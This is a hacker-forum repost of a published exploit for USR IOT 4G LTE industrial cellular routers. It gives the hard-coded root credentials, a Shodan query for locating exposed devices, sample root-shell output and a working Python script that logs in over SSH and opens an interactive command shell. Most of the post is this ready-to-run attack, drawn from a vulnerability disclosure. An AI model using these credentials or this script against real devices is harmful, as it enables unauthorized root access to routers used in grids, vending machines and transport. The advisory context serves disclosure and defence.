Jump to content

  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor

 Share
HACK1949

By HACK1949,
in CHT Vulnerability database

Recommended Posts

HACK1949 Grand Master

HACK1949

Posted
Posted 
# Exploit Title: USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor
# Exploit Author: LiquidWorm

#!/usr/bin/env python3
#
#
# USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor
#
#
# Vendor: Jinan USR IOT Technology Limited
# Product web page: https://www.pusr.com | https://www.usriot.com
# Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808)
#                   1.2.7 (USR-LG220-L)
#
# Summary: USR-G806 is a industrial 4G wireless LTE router which provides
# a solution for users to connect own device to 4G network via WiFi interface
# or Ethernet interface. USR-G806 adopts high performance embedded CPU which
# can support 580MHz working frequency and can be widely used in Smart Grid,
# Smart Home, public bus and Vending machine for data transmission at high
# speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG,
# flow control and has many advantages including high reliability, simple
# operation, reasonable price. USR-G806 supports WAN interface, LAN interface,
# WLAN interface, 4G interface. USR-G806 provides various networking mode
# to help user establish own network.
#
# Desc: The USR IOT industrial router is vulnerable to hard-coded credentials
# within its Linux distribution image. These sets of credentials are never
# exposed to the end-user and cannot be changed through any normal operation
# of the device. The 'usr' account with password 'www.usr.cn' has the highest
# privileges on the device. The password is also the default WLAN password.
# Shodan Dork: title:"usr-*"  // 4,648 ed ao 15042022
#
# -------------------------------------------------------------------------
# lqwrm@metalgear:~$ python usriot_root.py 192.168.0.14
#
# --Got rewt!
# # id;id root;pwd
# uid=0(usr) gid=0(usr)
# uid=2(root) gid=2(root) groups=2(root)
# /root
# # crontab -l
# */2 * * * * /etc/ltedial
# */20 * * * * /etc/init.d/Net_4G_Check.sh
# */15 * * * * /etc/test_log.sh
# */120 * * * * /etc/pddns/pddns_start.sh start &
# 44 4 * * * /etc/init.d/sysreboot.sh &
# */5 * * * * ps | grep "/usr/sbin/ntpd"  && /etc/init.d/sysntpd stop;
# 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop;
# cat /tmp/usrlte_info
# Local time is Fri Apr 15 05:38:56 2022
# (loop)
# IMEI Number:8*************1
# Operator information:********Telecom
# signal intensity:normal(20)
#
# Software version number:E*****************G
# SIM Card CIMI number:4*************7
# SIM Card number:8******************6
# Short message service center number:"+8**********1"
# system information:4G Mode
# PDP protocol:"IPV4V6"
# CREG:register
# Check ME password:READY
# base station information:"4**D","7*****B"
# cat /tmp/usrlte_info_imsi
# 4*************7
# # exit
#
# lqwrm@metalgear:~$ 
# -------------------------------------------------------------------------
#
# Tested on: GNU/Linux 3.10.14 (mips)
#            OpenWrt/Linaro GCC 4.8-2014.04
#            Ralink SoC MT7628 PCIe RC mode
#            BusyBox v1.22.1
#            uhttpd
#            Lua
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2022-5705
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php
#
#
# 10.04.2022
#


import paramiko as bah
import sys as baaaaaah

bnr='''
        ▄• ▄▌.▄▄ · ▄▄▄  ▪        ▄▄▄▄▄        
        █▪██▌▐█ ▀. ▀▄ █·██ ▪     •██          
        █▌▐█▌▄▀▀▀█▄▐▀▀▄ ▐█· ▄█▀▄  ▐█.▪        
        ▐█▄█▌▐█▄▪▐█▐█•█▌▐█▌▐█▌.▐▌ ▐█▌·        
▄▄▄▄·  ▄▄▄·▀ ▄▄·▀▄ •▄ ·▄▄▄▄ ▀█▄▀▪ ▀▀▀    ▄▄▄  
▐█ ▀█▪▐█ ▀█ ▐█ ▌▪█▌▄▌▪██▪ ██ ▪     ▪     ▀▄ █·
▐█▀▀█▄▄█▀▀█ ██ ▄▄▐▀▀▄·▐█· ▐█▌ ▄█▀▄  ▄█▀▄ ▐▀▀▄ 
██▄▪▐█▐█ ▪▐▌▐███▌▐█.█▌██. ██ ▐█▌.▐▌▐█▌.▐▌▐█•█▌
·▀▀▀▀  ▀  ▀ ▄▄▄▀ ·▀  ▀▀▀▀▀▀• ▄▄▄▄▄▪ ▀█▄▀▪.▀  ▀
            ▀▄ █·▪     ▪     •██              
            ▐▀▀▄  ▄█▀▄  ▄█▀▄  ▐█.▪            
            ▐█•█▌▐█▌.▐▌▐█▌.▐▌ ▐█▌·            
         ▄▄▄·▀ ▄▄·▀█▄▄· ▄▄▄▀..▄▄▀· .▄▄ ·      
        ▐█ ▀█ ▐█ ▌▪▐█ ▌▪▀▄.▀·▐█ ▀. ▐█ ▀.      
        ▄█▀▀█ ██ ▄▄██ ▄▄▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄     
        ▐█ ▪▐▌▐███▌▐███▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█     
         ▀  ▀ ·▀▀▀ ·▀▀▀  ▀▀▀  ▀▀▀▀  ▀▀▀▀      
'''
print(bnr)

if len(baaaaaah.argv)<2:
    print('--Gief me an IP.')
    exit(0)

adrs=baaaaaah.argv[1]
unme='usr'
pwrd='www.usr.cn'

rsh=bah.SSHClient()
rsh.set_missing_host_key_policy(bah.AutoAddPolicy())
try:
    rsh.connect(adrs,username=unme,password=pwrd,port=2222) #22 Ook.
    print('--Got rewt!')
except:
    print('--Backdoor removed.')
    exit(-1)

while True:
    cmnd=input('# ')
    if cmnd=='exit':
        rsh.exec_command('exit')
        break
    stdin,stdout,stderr = rsh.exec_command(cmnd)
    print(stdout.read().decode().strip())

rsh.close()
Link to post
Link to comment
Share on other sites
 Share
Go to topic listing

discussion group

discussion group

  
    You don't have permission to chat.

    • Recently Browsing   0 members

      • No registered users viewing this page.

    黑客世界站内导航 (SITE MAP)

    ×
    ×
    • Create New...